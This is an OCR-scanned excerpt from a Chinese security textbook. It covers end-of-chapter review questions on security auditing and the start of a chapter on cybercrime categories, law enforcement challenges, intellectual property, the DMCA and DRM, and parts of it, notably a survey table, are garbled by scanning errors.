interposable library ( 插 人 库 ) thresholding (ÈR{É ) 

loadable modules (可 装载 模块 ) user-level audit trail (用 户 级 审计 迹 ) 

log (日 志 ) windowing (窗口 ) 


physical access audit trail (物理 访问 审计 迹 ) 


复习 题 


18.1 解释 安全 审计 消息 和 安全 报警 之 间 的 区 别 。 
18.2” 列 出 并 简要 地 描述 安全 审计 和 报警 模型 的 组 件 。 
18.3” 列 出 并 简要 地 描述 安全 审计 的 主要 功能 。 

18.4 ”审计 数据 应 该 在 什么 范围 (数据 的 类 别 ) 内 收集 ? 
18.5 列 出 并 解释 4 个 不 同类 别 的 审计 迹 的 区 别 。 

18.6 UNIX 的 Syslog 工具 的 主要 组 件 是 什么 ? 

18.7 解释 插入 库 怎样 应 用 于 应 用 程序 级 审计 。 

18.8 解释 审计 复核 和 审计 分 析 之 间 的 区 别 。 

18.9 ”什么 是 安全 信息 和 事件 管理 (SIEM) 系统 ? 
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习题 


18.1 ”比较 表 18-2 和 表 18-3， 讨 论 其 中 重 于 和 不 重 春 的 部 分 以 及 它们 的 意义 。 
a. 有 没有 在 表 18-2 可 以 找到 而 表 18-3 中 没有 的 项 ? 讨论 其 中 的 理由 。 
b. 有 没有 在 表 18-3 可 以 找到 而 表 18-2 中 没有 的 项 ? 讨论 其 中 的 理由 。 
18.2 [KUPE04] 中 给 出 了 可 审计 事件 的 另 一 列表 ， 如 表 18-6 所 示 ， 将 此 表 与 表 18-2 和 表 18-3 进行 
比较 。 
a. 有 没有 在 表 18-2 和 表 18-3 可 以 找到 而 表 18-6 中 没有 的 项 ? 讨论 其 中 的 理由 。 
b. 有 没有 在 表 18-6 可 以 找到 而 表 18-2 MK 18-3 中 没有 的 项 ?讨论 其 中 的 理由 。 
18.3 讨论 在 18.5 节 提 到 的 基于 代理 和 无 代理 的 SIEM 软件 方法 的 优点 和 缺点 。 


表 18-6 建议 审计 的 事件 列表 


身份 认证 失败 的 程序 访问 用 户 交 互 
。 口令 更 改 。 键 和 人 的 速度 
。 失败 的 登录 事件 。 键 人 错误 
。 成 功 的 登录 尝试 系统 级 参数 。 键 人 的 时 间 间 隔 
© 终端 类 型 © 系统 级 CPU 活动 (装载 ) 。 键入 的 节奏 
© 登录 地 点 © 系统 级 磁盘 活动 。 压力 的 模拟 量 
。 查询 用 户 身 份 。 系统 级 内 存 使 用 。 窗口 事件 
。 不 存在 的 账户 的 登录 尝试 。 一 个 地 点 的 多 个 事件 
© 使 用 的 终端 文件 访问 。 存在 事件 的 多 个 地 点 
。 登录 类 型 (交互 / 自动 ) 。 文件 创建 。 鼠标 移动 
。 认证 方法 。 文件 读 取 。 鼠标 点 击 
。 退出 时 间 。 文件 写 入 e 空闲 时 间 
。 总 的 连接 时 间 。 文件 删除 。 连接 时 间 
。 退出 原因 。 试 图 访问 另 一 个 用 户 的 文件 © 从 终端 发 送 的 数据 
。 试图 访问 “敏感 ”文件 © 发 送 到 终端 的 数据 
操作 系统 的 操作 。 失败 的 文件 访问 
。 审计 启用 。 访问 权限 改变 FT ED AY HEE DL 
。 试图 关闭 审计 。 标签 改变 
。 试图 改变 审计 配置 。 目录 修改 
。 将 一 个 对 象 放 人 另 一 用 户 内 存 空间 网 络 活动 
。 从 其 他 用 户 存储 空间 删除 对 象 文件 信息 。 收 到 的 包 
。 改变 特权 ° ZF 。 协议 
。 改变 组 标签 。 Hy li] Ak © 源 地 址 
。 使 用 “敏感 ”命令 。 类 型 。 目的 地 址 
。 内容 。 源 端口 

成 功 的 程序 访问 。 所 有 者 © 目的 端口 
。 命令 名 和 参数 。 组 。 KE 
。 使 用 的 时 间 。 许可 。 载荷 大 小 
。 使 用 的 日 期 。 标签 e 载荷 
。 占用 的 CPU 时 间 。 物理 设备 e 校 验 和 
。 占用 时 间 © REAR 。 标志 
。 访问 的 文件 。 被 打开 的 端口 
© 访问 的 文件 数 。 被 关闭 的 端口 
。 使 用 的 最 大 内 存 。 请 求 的 连接 

。 关闭 的 连接 

。 连接 重 置 
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法 律 与 道德 问题 





学 习 目 标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
o 讨论 计算 机 犯罪 的 不 同类 型 ; 


© 理解 知识 产权 的 类 型 ; 
o 概述 隐私 权 方 面 的 关键 问题 ; 
e 比较 和 对 比 编纂 计算 机 伦理 的 方法 。 


计算 机 安全 的 法 律 和 道德 问题 涉及 的 范围 非常 广 ， 全 部 讨论 的 话 ， 将 远 远 超出 本 书 的 范 
围 。 本 章 我 们 讨论 该 领域 里 几 个 重要 的 问题 。 


19.1 网 络 犯 罪 和 计算 机 犯罪 


本 书 使 用 很 大 的 篇 幅 分 析 了 计算 机 和 网 络 攻击 的 检测 、 阻 止 和 恢复 等 方面 的 技术 方法 。 第 
16 章 和 第 17 章 分 别 研 究 了 用 于 加 强 计算 机 安全 的 物理 安全 方法 和 与 人 为 因素 相关 的 方法 。 所 
有 这 些 方法 ,虽然 能 够 明显 提升 计算 机 的 安全 性 , 但 是 在 检测 预防 犯罪 方面 并 不 能 保证 完全 成 
功 。 另 外 一 种 应 对 攻击 的 手段 是 执法 威慑 。 许 多 类 型 的 计算 机 攻击 可 以 被 认为 是 犯罪 ， 因 此 会 
受到 法 律 制裁 。 这 一 节 我 们 从 计算 机 犯罪 的 分 类 开始 介绍 ， 之 后 讨论 在 处 理 计算 机 犯罪 的 执法 
过 程 中 所 面临 的 特有 的 挑战 。 


19.1.1 计算 机 犯罪 的 类 型 


术语 计算 机 犯罪 或 者 网 络 犯 罪 广泛 用 于 描述 以 计算 机 或 者 计算 机 网 络 作为 工具 、 目 标 或 者 
犯罪 场所 2 的 犯罪 行为 。 这 些 分 类 并 不 是 互 斥 的 ， 而 且 许 多 活动 可 以 属于 其 中 的 一 类 或 者 其 中 
的 几 类 。 网 络 犯罪 具有 犯罪 行为 使 用 到 了 网 络 这 一 内 涵 ， 而 计算 机 犯罪 可 以 涉及 网 络 ， 也 可 以 
不 涉及 。 

美国 司法 部 [DOJ00]， 根 据 计 算 机 在 犯罪 活动 中 所 起 的 作用 ， 将 计算 机 犯罪 进行 了 以 下 
分 类 : 

e 将 计算 机 作为 攻击 目标 (computer as target): 这 种 形式 的 犯罪 把 计算 机 系统 作为 目标 ， 

不 经 过 授权 或 付费 (窃取 服务 ) 就 获取 计算 机 系统 上 存储 的 信息 ， 对 目标 计算 机 系统 进 
行 控 制 ， 改 变数 据 的 完整 性 ， 影 响 计 算 机 或 服务 器 的 可 用 性 。 用 第 1 章 中 的 术语 描述 
就 是 ， 这 种 形式 的 犯罪 包括 针对 数据 完整 性 、 系 统 完整 性 、 数 据 机 蜜 性、 隐私 和 可 用 
性 进行 的 攻击 。 
将 计算 机 作为 存储 设备 (computers as storage device): 通过 把 计算 机 或 者 计算 机 设备 作 
为 一 个 被 动 的 存储 媒介 ， 进 行 更 深层 次 的 非法 活动 。 例 如 ,计算机 能 够 被 用 来 存储 鳃 
取 的 口令 列表 、 信 用 卡号 、 公 司 内 部 信息 、 色 情 影像 文件 或 者 “warez”( 盗 版 的 商业 
软件 )。 





O ”这 个 定义 来 源 于 纽约 法 学 院 的 课程 ， 这 些 课 程 包括 网 络 犯 罪 、 网 络 怒 怖 主义 和 数字 执法 (Digital Law 


Enforcement )(information-retrieval.info/cybercrime/index.html ) < 
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e 将 计算 机 作为 通信 工具 (computer as communications tool): 多 数 这 种 类 型 的 犯罪 属于 在 
线 进 行 的 简单 传统 的 犯罪 。 例 子 包 括 ， 非 法 出 售 处 方药 、 违 禁 商 品 、 酒 类 和 枪 文 ， 诈 
骗 ， 赌 博 和 传播 儿童 色情 内 容 等 。 
有 关 更 详细 的 计算 机 犯罪 列表 ， 在 国际 网 络 犯罪 公约 ( Convention on Cybercrime) 9 中 给 
出 了 其 定义 ， 如 表 19-1 所 示 。 这 个 表 非 常 有 用 ， 因 为 它 代 表 了 一 种 国际 的 共识 一 一 关于 哪些 
犯罪 能 构成 计算 机 犯罪 或 者 网 络 犯罪 ， 以 及 哪些 犯罪 被 公认 为 是 重要 的 。 


表 19-1 引 自 《网 络 犯 罪 公约 》 的 网 络 犯 罪 类 型 
条 款 2 ”非法 访问 
未 经 授权 访问 计算 机 系统 的 全 部 或 者 任何 部 分 。 
条 款 3 ”非法 拦截 


采用 技术 手段 ， 未 经 授权 地 拦截 由 计算 机 传 出 、 传 人 到 计算 机 上 或 者 计算 机 系统 内 部 的 非 公 开 计算 机 数据 传输 ， 
包括 从 计算 机 系统 发 出 的 携带 计算 机 数据 的 电磁 辐射 。 


条 款 4 数据 干扰 
未 经 授权 损坏 、 删 除 、 改 变 或 者 抑制 计算 机 数据 。 
条 款 5 ”系统 干扰 
未 经 授权 通过 输入 、 传 输 、 损 坏 、 删 除 、 改 变 或 者 抑制 计算 机 数据 ， 严 重 影响 计算 机 系统 的 功能 。 
条 款 6 设备 滥用 
a 生产 、 销 售 、 采 购 、 进 口 、 分 发 或 者 以 其 他 形式 制造 流通 以 下 物品 : 
i. 一 种 设备 ， 包 括 计算 机 程序 ， 被 设计 和 改造 成 以 进行 条 款 2 一 5 指明 的 任何 犯罪 活动 为 主要 目的 。 
i. 一 个 计算 机 口令 、 访 问 代码 或 者 类 似 的 数据 ， 通 过 它 可 以 访问 计算 机 系统 部 分 或 者 全 部 ， 且 具有 使 其 用 于 条 
ak 2 一 $ 指明 的 任何 犯罪 活动 的 动机 。 
b. 拥有 以 上 ai 或 者 aii 段落 提 及 的 物品 ， 并 具有 实施 条 款 2 一 5 所 指明 的 任何 犯罪 活动 的 动机 。 在 追加 刑事 责任 
前 ， 法 律 要 求 当 事 人 拥有 一 定数 量 的 这 些 物品 。 
RAT 计算 机 相关 的 伪造 


通过 输入 、 改 变 、 删 除 或 者 抑制 计算 机 数据 ， 故 意 致 使 不 真实 的 数据 被 认为 是 真实 的 ， 且 是 用 于 合法 目的 的 ,无 
论 这 些 数据 是 否 是 直接 可 读 的 和 可 理解 的 。 


条 款 8 计算 机 相关 的 诈骗 
通过 以 下 方式 ， 引 起 他 人 财产 丧失 : 
a. 任何 对 计算 机 数据 的 输入 、 改 变 、 删 除 或 者 抑制 。 
b. 任何 未 经 授权 ， 以 为 自身 或 他 人 人 牟取 经 济 利益 为 目的 ， 并 具有 欺骗 或 不 诚实 信用 的 主观 故意 ， 对 计算 机 系统 的 
功能 进行 干扰 的 行为 。 
RAI 与 儿童 色情 有 关 的 犯罪 
a. 生产 儿童 色情 制品 ， 并 以 使 用 计算 机 系统 将 其 传播 为 目的 。 
b. 通过 计算 机 系统 提供 或 者 生产 流通 儿童 色情 制品 。 
c. 通过 计算 机 系统 散播 或 者 传递 儿童 色情 制品 。 
d. 通过 计算 机 系统 为 自己 或 者 他 人 获取 儿童 色情 制品 。 
e. 在 计算 机 系统 中 或 者 在 计算 机 数据 存储 介质 上 储存 儿童 色情 制品 。 r, 
条 款 10 ”对 版 权 及 其 相关 权利 的 侵权 
条 款 11 企图 、 帮 助 或 教唆 行为 


帮助 和 教唆 实施 本 公约 条 款 2 一 10 规定 的 任何 犯罪 活动 。 企 图 实施 本 公约 条 款 3 一 5、7、8 URR 9.1.a 和 c 指 
定 的 任何 犯罪 活动 。 


O 2001 年 网 络 犯罪 公约 是 第 一 个 国际 条 约 ， 该 条 约 旨 在 通过 统一 国家 法 律 ， 增 加 技术 投资 和 加 强 各 国 间 的 合 
作 来 解决 网 络 犯罪 问题 。 它 是 由 欧洲 理事 会 发 起 的 而 且 是 被 包括 美国 在 内 的 43 个 国家 认可 的 。 这 份 公约 包 
含 一 项 网 络 犯罪 列表 ， 每 个 签约 国 必须 将 其 移 到 自己 的 法 律 中 。 


然而 ， 在 CERT 2007 年 电子 犯罪 调查 ( E-crime Survey) 年 度 报告 中 ， 采 用 了 另外 一 种 分 
类 方法 ， 如 表 19-2 所 示 。 表 中 第 二 列 的 数字 表明 受 访 者 报告 至 少 发 生 过 一 次 相应 行 中 类 别 事 
件 的 比例 。 其 余 三 列 中 的 数字 表明 受 访 者 报告 受到 过 已 知 攻击 源 攻击 的 比例 9 。 


表 19-2 MZ CERT 2007 电子 犯罪 调查 结果 
犯罪 率 AMAR | 外 部 人 员 | 未 知 来 源 
( 兆 %) (%) (%) (%) 


= : 


.病毒 Sh aN A CS 

未 经 授权 访问 /使 用 信息 、 系 统 或 者 网 络 

非法 制造 垃圾 邮件 

间谍 软件 〈 不 包括 恶意 广告 ) 

拒绝 服务 攻击 

欺骗 (信用卡 诈骗 等 ) 

网 络 钓鱼 ( 某 人 在 网 上 冒充 你 们 公司 企图 获取 你 们 客户 和 员工 
的 个 人 资料 ) 

盗用 其 他 信息 (财产 )， 包 括 消费 者 记录 、 财 务 记录 等 

盗用 知识 产权 

故意 泄露 私人 或 者 敏感 信息 


破坏 ;六 意 破坏 、 删 除 或 者 毁坏 信息 、 系 统 或 者 网 络 6 
机 构 网 络 中 的 僵尸 机 / 僵尸 程序 (bot) / 通过 僵尸 网 络 使 用 网 络 | 30 | || am 
网 站 算 改 24 - 


19.1.2 执法 面临 的 挑战 


在 计算 机 和 网 络 攻击 方面 ， 执 法 的 威慑 作用 与 逮捕 和 起 诉 罪犯 的 成 功率 有 关 。 而 网 络 犯 
罪 的 本 质 ， 决 定 了 对 网 络 罪犯 的 逮捕 和 起 诉 想 要 得 到 一 贯 的 成 功 是 非常 困难 的 。 为 了 理解 这 一 
点 ， 需 要 参考 [ KSHE06 ] 中 提 到 的 ， 什 么 是 网 络 犯罪 的 恶性 循环 ， 其 中 涉及 执法 机 构 、 网 络 
罪犯 和 网 络 受害 者 。 

对 于 执法 机 构 (law enforcement agency)， 网 络 犯 罪 提出 了 一 些 特 有 的 难题 。 要 进行 适当 的 
调查 需要 相当 熟练 地 掌握 相关 的 技术 。 虽 然 一 些 机 构 ， 特 别 是 大 型 机 构 ， 在 这 一 领域 正在 努力 
自 赴 ， 但 是 许多 司法 部 门 的 调查 员 缺 乏 处 理 这 类 犯罪 的 知识 和 经 验 。 另 一 个 障碍 是 相关 资源 的 
缺乏 。 一 些 网 络 犯罪 调查 需要 有 相当 高 的 计算 机 处 理性 能 、 通 信和 能 力 和 存储 能 力 ， 这 可 能 超出 
了 司法 部 门 的 预算 。 网 络 犯罪 的 全 球 性 本 质 上 成 了 一 个 附加 的 障碍 : 许多 案件 中 罪犯 远离 目标 
系统 ， 身 处 另 一 个 辖区 ， 甚 至 另 一 个 国家 。 因 此 同 远程 执法 机 构 的 协作 与 合作 的 缺乏 会 极 大 地 
妨碍 调查 工作 。 国 际 网 络 犯罪 公约 已 经 迈 出 了 令 人 鼓舞 的 第 一 步 。 该 公约 至 少 提出 了 一 组 共同 
的 犯罪 术语 和 一 个 协调 法 律 全 球 化 的 框架 。 


LA 


O 注意 ， 同 一 行 中 后 面 三 列 中 的 数字 的 总 和 可 能 超过 100% ,这 是 因为 一 个 受 访 者 可 能 报告 了 来 自 多 个 攻击 源 
的 多 个 事件 〈 例 如, 一 个 受 访 者 遭受 过 来 自 内 部 和 外 部 的 拒绝 服务 攻击 )。 
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对 网 络 罪犯 ( cybercriminal) 进行 有 效 制 裁 的 案例 相对 缺乏 ， 这 导致 了 网 络 罪 犯 数量 的 
增加 ， 犯 罪 者 变 得 更 为 大 胆 ， 而 且 犯 罪 活动 也 趋 于 全 球 化 。 用 经 常 处 理 其 他 类 型 惯 犯 的 方法 
来 描述 网 络 罪犯 显得 很 困难 。 虽 然 网 络 罪犯 趋 于 年 轻 化 而 且 更 加 精通 计算 机 ， 但 他 们 的 行为 
特征 却 是 广泛 和 不 特定 的 。 而 且 ， 目 前 尚 没 有 能 够 帮助 调查 员 指出 可 能 的 嫌疑 犯 的 网 络 罪犯 数 
据 库 。 

网 络 犯罪 屡屡 得 手 ， 以 及 相对 较 少 的 成 功 执法 案例 ， 都 影响 着 网 络 犯 罪 受 害 者 〈cyber- 
crime victims) 的 行为 。 像 执法 系统 一 样 ， 许 多 可 能 成 为 被 攻击 的 对 象 的 机 构 ， 没 有 在 技术 、 
硬件 、 人 力 资 源 方 面 进 行 足够 的 投资 以 避免 受到 攻击 。 由 于 对 执法 系统 缺乏 信心 ， 对 公司 声 
誉 和 民事 责任 的 担心 ， 导 致 报告 率 低下 。 低 报告 率 和 不 情愿 同 执法 人 员 合作 的 情况 导致 执法 
工作 陷 和 人 困境 ， 这 将 形成 恶性 循环 。 


19.1.3 积极 配合 执法 


行政 管理 人 员 和 安全 管理 员 需 要 把 执法 系统 看 成 是 技术 的 、 物 理 的 和 人 为 因素 资源 之 外 
的 另 一 种 资源 和 工具 。 对 执法 系统 的 成 功利 用 更 多 是 依靠 人 际 关 系 能 力 而 不 是 技术 能 力 。 管 
理 者 需要 熟悉 犯罪 调查 流程 、 调 查 者 所 需要 的 信息 ， 以 及 受害 者 对 调查 工作 发 挥 积极 作用 的 
方式 。 


19.2 ”知识 产权 


美国 法 律 及 世界 上 各 种 法 律 体系 通常 将 财产 分 为 三 大 主要 类 型 . 

e 不 动产 (real property): 土地 及 永久 附属 于 土地 的 东西 ， 例 如 树木 、 建 筑 和 处 于 固定 状 
态 的 活动 住房 。 

e 私有 财产 (personal property) : 私人 物品 、 可 移动 财产 和 商品 ， 例 如 汽车 、 银 行 账户 、 
薪水 、 股 票 、 小 生意 、 家 具 、 保 险 单 、 珠 宝 、 专 利 、 宠 物 和 赛季 棒球 门票 等 。 

e 知识 产权 (intellectual property): 由 人 类 的 知识 和 想法 组 成 的 任何 无 形 资产 。 包 括 软 件 、 
数据 、 小 说 、 录 音 资 料 、 新 型 捕 鼠 需 的 设计 或 者 疾病 的 治疗 方案 等 。 

本 节 内 容 主要 是 关于 知识 产权 在 计算 机 安全 方面 的 问题 。 


19.2.1 知识 产权 的 类 型 


受 法 律 保 护 的 知识 产权 通常 有 三 种 主要 类 型 : 版 权 、 商 标 权 和 专利 权 。 法 律 保 护 针对 的 是 侵 
权 (infringement) 行为 ， 即 对 版 权 、 商 标 权 和 专利 权 
所 保护 的 权利 的 侵犯 。 这 种 权利 是 指 授予 知识 产权 所 
有 者 (IP owner) 用 来 向 那些 侵权 者 寻求 民事 赔偿 的 
权利 。 根 据 知 识 产 权 类 型 的 不 同 ， 侵 权 行 为 可 能 会 有 
所 不 同 ( 见 图 19-1). 

版 权 ”版 权 法 保护 对 于 某 个 想法 的 有 形 或 者 确定 的 
表达 ， 而 不 是 该 想法 本 身 。 如 果 以 下 条 件 全 部 满足 9， 
创建 者 就 能 够 声明 其 版 权 ， 并 要 求 国家 政府 版 权 部 门 
为 其 授予 版 权证 书 : 

e 所 提议 的 作品 是 原创 的 。 










专利 
未 经 授权 擅自 制造 、 
使 用 或 者 出 售 


版 权 
未 经 授权 擅自 使 用 


图 19-1 知识 产权 侵权 


O ”版权 是 在 遵从 伯 恩 公约 ( Berne convention) 的 国家 内 自动 分 配给 新 研发 的 产品 的 ， 绝 大 多 数 国 家 都 包含 在 
A. 一 些 国家 ,例如 美国 ， 会 为 已 经 注册 的 产品 提供 额外 的 法 律 保护 。 


e 作者 将 这 个 原创 的 想法 用 具体 形式 表现 了 出 来 ， 例 如 人 硬 拷贝 ( 纸 )、 软 件 或 者 多 媒体 等 
形式 。 
可 能 获得 版 权 的 项 目 举例 包括 [BRAU01 |: 
e 文学 作品 (literary work): 小 说 、 非 小 说 类 散文 、 诗 歌 、 报 纸 和 报纸 文章 、 杂 志和 杂志 
文章、 目录 、 小 册子 、 广 告 (文本 ) 和 编辑 物 如 商业 目录 。 
e 音乐 作品 (musical work): 了 歌曲、 广告 歌曲 和 乐句 。 
© 戏剧 作品 (dramatic work): 戏剧 、 歌 剧 和 短 剧 。 
舞剧 和 舞台 舞蹈 作品 (pantomime and choreographic work): EE., MRE, Be BEAM 
剧 作品 。 
e mR, ARMERET (pictorial, graphic, and sculptural work): 相片 、 海 报 、 地 图 、 绘 
画 、 图 画 、 形 象 艺术 、 广 告 宣传 、 连 环 画 和 卡通 人 物 形象 、 动 物 玩 个、 雕像 、 绘 画 和 
好 的 艺术 作品 。 
电影 和 其 他 视听 作品 (motion picture and other audiovisual work): 电影 、 纪 录 片 、 游 记 、 
培训 影片 和 录像 、 电 视 节 目 、 电 视 广 告 和 互动 性 多 媒体 作品 。 
e 录音 制品 (sound recording): 音乐 、 声 音 或 者 语言 文字 的 录制 品 。 
© 建筑 设计 作品 (architectural work): 建筑 物 设计 ， 可 以 是 建筑 规划 、 制 图 形式 的 ， 也 可 
以 是 建筑 物 本 号 。 
o 软件 相关 的 制品 ( software-related work): 计算 机 软件 、 软 件 文档 和 手册 、 培 训 手 册 及 
其 他 手册 。 
版 权 所 有 者 拥有 以 下 独 有 的 权利 ， 这 些 权 利 受到 保护 以 免 受 侵犯 : 
e 复制 权 (reproduction right): 人 允许 版 权 拥 有 者 复制 作品 。 
e 修改 权 (modification right): 也 称 为 派生 作品 权 ， 涉 及 以 修改 原作 品 的 方式 创作 出 新 的 
或 是 派生 的 作品 。 
e 发 行 权 (distribution right): 允许 版 权 拥 有 者 公开 出 售 、 出 租 或 者 出 借 作 品 副 本 。 
e 公开 表演 权 (public-performance right): 主要 是 允许 现场 演出 。 
© 公开 展示 权 ( public-display right): 允许 版 权 拥 有 者 直接 或 者 通过 影片 、 约 灯 片 或 电视 
图 像 手段 公开 展示 产品 副本 。 
专利 ”一 项 发 明 专 利 是 授予 发 明 者 的 一 种 产权 。 用 美国 成 文法 和 专利 授权 本 喘 的 话说 ， 专 
利 赋 予 了 这 样 一 种 权利 ,“ 该 权利 排除 了 他 人 在 美国 制造 、 使 用 、 出 售 或 者 贩卖 发 明 或 者 引进 
该 发 明 进 入 美国 ” 。 其 他 国家 在 相关 法 令 中 也 有 类 似 的 措 本 。 专 利 有 三 种 类 型 ; 
© 实用 专利 (utility patent): 可 能 授予 那些 发 明 或 发 现任 何 新 的 有 用 的 流程 、 机 带 、 制 品 、 
物质 成 分 ， 或 者 对 它们 进行 新 的 有 用 的 改进 的 任何 人 。 
© 设计 专利 (design patent): 可 能 授予 那些 发 明了 制品 的 新 的 、 原 创 的 和 装饰 性 设计 的 任 


何人 。 
© 植物 专利 ( plant patent): 可 能 授予 那些 发 明 或 发 现 并 且 无 性 对 殖 出 新 的 独特 的 植物 品 
种 的 任何 人 。 


一 项 计算 机 安全 领域 的 专利 实例 是 RSA 公 钥 密码 体制 。 从 1983 年 被 授权 直到 2000 年 专 
利 期 满 ， 专 利 的 拥有 者 网 络 安全 公司 (RSA Security) 有 权 向 每 个 应 用 RSA 算法 的 人 收取 费用 。 

商标 ”商标 是 被 用 来 在 商品 贸易 中 代表 商品 源 并 用 来 区 别 于 其 他 商品 的 一 个 词 、 名 称 、 符 
号 或 者 图 案 。 服 务 标签 ， 除 了 识别 和 区 分 的 是 服务 源 而 不 是 商品 外 ， 和 商标 是 相同 的 。 术 语 商 
标 和 标签 通常 是 指 商 标 和 服务 标签 二 者 。 商 标 权 不 允许 他 人 使 用 相似 的 具有 混淆 作用 的 商标 ， 
但 不 能 阻止 他 人 利用 具有 明显 不 同 的 标签 来 制造 相同 的 商品 或 者 出 售 相 同 的 产品 或 服务 。 
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19.22 与 网 络 和 计算 机 安全 相关 的 知识 产权 


一 些 形式 的 知识 产权 与 网 络 和 计算 机 安全 的 环境 有 关 。 我 们 在 这 里 介绍 几 种 最 突出 的 
形式 : 
e 软件 (software): 包括 由 商业 软件 开发 商 开 发 的 程序 (例如 ， 操 作 系 统 、 实 用 程序 和 应 
用 软件 ) 以 及 共享 软件 、 机 构 内 部 开发 供 内 部 使 用 的 专 有 软件 和 个 人 开发 的 软件 。 如 
果 有 必要 ， 以 上 这 些 软件 的 版 权 都 可 以 受到 保护 。 在 某 些 情况 下 ， 也 适用 于 专利 保护 。 
e 数据 库 (database): 数据 库 可 能 包括 因为 具有 潜在 商业 价值 而 收集 并 组 织 的 数据 。 经 济 
预测 数据 库 就 是 其 中 的 一 个 例子 。 这 种 数据 库 可 能 要 受 版 权 保 护 。 
e 数字 内 容 (digital content): 包括 视频 文件 、 音 频 文件 、 多 媒体 、 课 件 、 网 站 内 容 和 任 
何其 他 的 原创 数字 作品 ， 这 类 数字 作品 能 用 计算 机 或 者 其 他 数字 设备 以 某 种 方式 展现 
出 来 。 
e Bi (algorithm): 取得 专利 的 算法 的 例子 是 RSA 公 钥 密码 体制 ， 前 面 我 们 已 经 提 过 。 
本 书 中 讨论 的 计算 机 安全 技术 ， 提 供 了 对 上 面 提 到 的 一 些 类 别 的 知识 产权 的 保护 。 例 如 ， 
统计 数据 库 的 目的 是 在 没有 用 户 访问 原始 数据 的 情况 下 也 能 够 产生 统计 结果 。 在 第 5$ 章 里 我 们 
讨论 了 保护 原始 数据 的 各 类 技术 。 另 一 方面 ， 如 果 用 户 被 允许 访问 诸如 操作 系统 或 者 应 用 程序 
的 软件 ， 即 使 没有 获得 许可 证 ， 用 户 也 可 能 制作 目标 镜像 并 分 发 副本 或 者 在 计算 机 上 使 用 它 
们 。 在 这 些 情 况 下 ， 提 供 保护 的 恰当 工具 是 法 律 制裁 而 不 是 技术 性 的 计算 机 安全 措施 。 


19.2.3 ”数字 于 年 版 权 法 案 


美国 数字 千年 版 权 法 案 (U.S. Digital Millennium Copyright Act, DMCA) 对 美国 和 全 世界 
的 数字 内 容 版 权 保护 都 有 着 深远 影响 。DMCA 是 为 了 执行 世界 知识 产权 条 约 ( WIPO) 而 设计 
的 ，1996 签署 ，1998 年 被 写 和 法律。 实质 上 ，DMCA 加 强 了 对 数字 形式 的 已 获 版 权 的 资料 的 
保护 。 

DMCA 鼓励 版 权 所 有 者 使 用 技术 措施 来 保护 版 权 产品 。 这 些 措 施 可 以 归纳 为 两 类 : 一 类 
是 阻止 访问 产品 的 措施 ， 男 一 类 是 禁止 复制 产品 的 措施 。 而 且 ， 法 律 禁止 企图 绕 过 这 些 措 施 的 
行为 。 特 别 是 ， 法 律 规定 “不 允许 任何 人 绕 过 对 受到 该 法 案 保 护 的 作品 进行 有 效 访问 控制 的 技 
术 措 施 。” 这 个 条 款 的 其 他 影响 是 ， 禁 止 几乎 所 有 对 内 容 进行 未 授权 的 解密 。 此 法 律 还 禁止 生 
产 、 发 行 ， 或 者 销售 能 够 攻击 加 密 方 法 的 产品 、 服 务 和 设备 ， 其 中 加 密 方 法 用 于 阻止 未 经 版 权 
所 有 者 授权 对 产品 进行 的 访问 或 者 复制 。 刑 事 处 罚 和 民事 处 罚 适 用 于 试图 规避 技术 措施 和 协助 
这 种 规避 的 行为 。 

某 些 活动 在 DMCA 和 其 他 版 权 法 条 款 中 是 可 以 得 到 窖 免 的 ， 包 括 以 下 几 项 : 

e 正当 使 用 (fair use): 这 个 概念 没有 固定 的 定义 。 其 目的 是 允许 他 人 根据 某 些 特殊 的 目 

的 执行 、 展 示 、 引 用 、 复 制 和 对 作品 部 分 内 容 进行 分 发 。 这 些 目的 包括 评审 、 评 论 和 
讨论 受 版 权 保护 的 作品 等 。 

© 逆向 工程 (reverse engineering): 如 果 用 户 有 权 使 用 程序 的 副本 ， 如 果 逆 向 工程 的 目的 

不 是 复制 程序 的 功能 而 是 取得 它 的 互 操 作 性 ， 软 件 产 品 的 逆 回 工程 是 可 以 允许 的 。 

e 加 密 研 究 (encryption research): 允许 进行 “善意 ”的 加 密 技 术 人 研究 。 事 实 上 ， 这 项 其 
免 允 许 和 尝试 破解 加 密 技 术 以 促进 加 密 技 术 的 发 展 。 
安全 测试 ( security testing): 这 是 经 版 权 所 有 者 或 者 操作 员 同 意 对 计算 机 或 者 网 络 进行 
的 访问 ， 目 的 是 进行 善意 的 测试 、 研 究 或 者 修补 某 个 安全 漏洞 或 缺陷 。 

e 个 人 隐私 (personal privacy) : 如 果 绕 过 技术 措施 是 防止 因 访 问 而 导致 个 人 识别 信息 或 
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记录 被 泄露 的 唯一 合理 的 方法 ， 那 么 通常 这 是 允许 的 。 
尽管 各 种 豁免 被 写 进 法 律 ， 但 是 ， 该 法 律 仍然 抑制 了 正当 的 安全 和 加 密 技 术 的 研究 ， 这 引 
起 了 相当 的 关注 ， 特 别 是 在 研究 和 学 术 团 体 中 。 这 些 团 体 认为 DMCA 抑制 了 创新 和 学 术 目 由 ， 
而 且 威胁 着 开源 软件 的 发 展 LACM041。 


19.2.4 ”数字 版 权 管理 


数字 版 权 管理 (DRM) 是 指 确保 数字 版 权 拥有 者 能 清楚 地 被 识别 并 对 其 作品 按 规定 收取 报 
酬 的 体制 和 程序 。 体 制 和 程序 也 可 以 对 数字 对 象 的 使 用 附加 进一步 的 限制 ， 例如， 禁止 印刷 或 
禁 目 进一步 的 发 行 。 

DRM 标准 或 者 体系 结构 不 是 独立 的 。DRM 包含 多 种 知识 产权 管理 的 方法 并 且 通 过 提供 
安全 可 信任 的 自动 化 服务 来 控制 内 容 的 发 布 和 使 用 。 总 的 来 说 ， 目 标 是 要 为 完整 的 内 容 管理 生 
命 周 期 (创作 、 他 人 后 来 的 贡献 、 访 问 、 发 行 、 使 用 ) 提供 机 制 ， 包 括 与 内 容 有 关 的 版 权 信息 
管理 。 

DRM 系统 应 该 实现 以 下 目标 : 

1. 提供 持久 的 内 容 保护 以 避免 他 人 未 经 授权 访问 数字 内 容 ， 限 制 对 那些 仅仅 经 过 一 定 授权 
的 访问 。 

2. 支持 各 种 数字 内 容 类 型 (例如 ， 音 乐 文件 、 视 频 流 、 数 字 书 籍 AR). 

3. 支持 在 多 种 平台 上 使 用 内 容 (例如 ，PC、PDA、iPod、 移 动 电 话 )。 

4. 支持 在 各 种 媒体 上 发 行内 容 ， 包 括 CD-ROM, DVD 和 flash 存储 。 

图 19-2 基于 [LIU03 |, M DRM 体制 中 主要 用 户 的 角度 ， 给 出 了 一 个 典型 的 DRM 模型 : 

